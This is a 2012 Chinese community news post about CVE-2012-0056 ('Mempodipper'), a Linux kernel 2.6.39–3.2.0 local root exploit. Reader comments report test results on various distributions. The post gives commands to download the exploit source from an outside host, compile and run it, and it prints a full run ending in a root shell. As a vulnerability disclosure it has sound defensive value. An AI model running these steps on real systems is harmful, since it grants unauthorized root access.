Linux 2.6.39 到 3.2.0 爆提权漏洞

威廉亨利
 威廉亨利
发布于 2012年01月29日
收藏 13

Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。

 

重现方法:

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

cc mempodipper.c

./a.out

 

在执行完毕后运行 whoami 来看是否执行成功。

 

已知发行版情况:

  • Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker Report
  • Fedora 16: 失败。内核 3.2.1-3.fc16.x86_64
  • Arch Linux: 失败。内核 3.2.2-1-ARCH

如果你测试了,请将测试结果告诉我们!注意告诉我们发行版和 uname -a 的结果。

 

我机子上测试成功了

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/20553/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
root

Ubuntu11.10

Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

本站文章除注明转载外,均为本站原创或编译。欢迎任何形式的转载,但请务必注明出处,尊重他人劳动共创开源社区。
转载请注明:文章转载自 OSCHINA 社区 [http://www.oschina.net]
本文标题:Linux 2.6.39 到 3.2.0 爆提权漏洞
加载中

最新评论(38

MikeManilone
MikeManilone
原文链接 http://www.osmsg.com/2012/01/linux-2639-root-hole/
遵守CC,请加上!!
LongRaindy
LongRaindy
失败鸟

[raindy@free01 ~]$ uname -a
Linux free01 2.6.32-100.34.1.el6uek.i686 #1 SMP Wed May 25 17:28:36 EDT 2011 i686 i686 i386 GNU/Linux
wx---每日佳选
wx---每日佳选
Linux wgbbiao-OptiPlex-790 2.6.38-13-generic #53-Ubuntu SMP Mon Nov 28 19:33:45 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

失败
ipeter
ipeter
3.0.0-12-generic #20-Ubuntu 有这个漏洞,官方源upgrade到3.0.0-12-generic #20-Ubuntu以后漏洞还是存在。
CentOS、Debian没成功,可能因为内核比较老。
威廉亨利
威廉亨利
ubuntu11.10今天更新后就失败了
返回顶部
顶部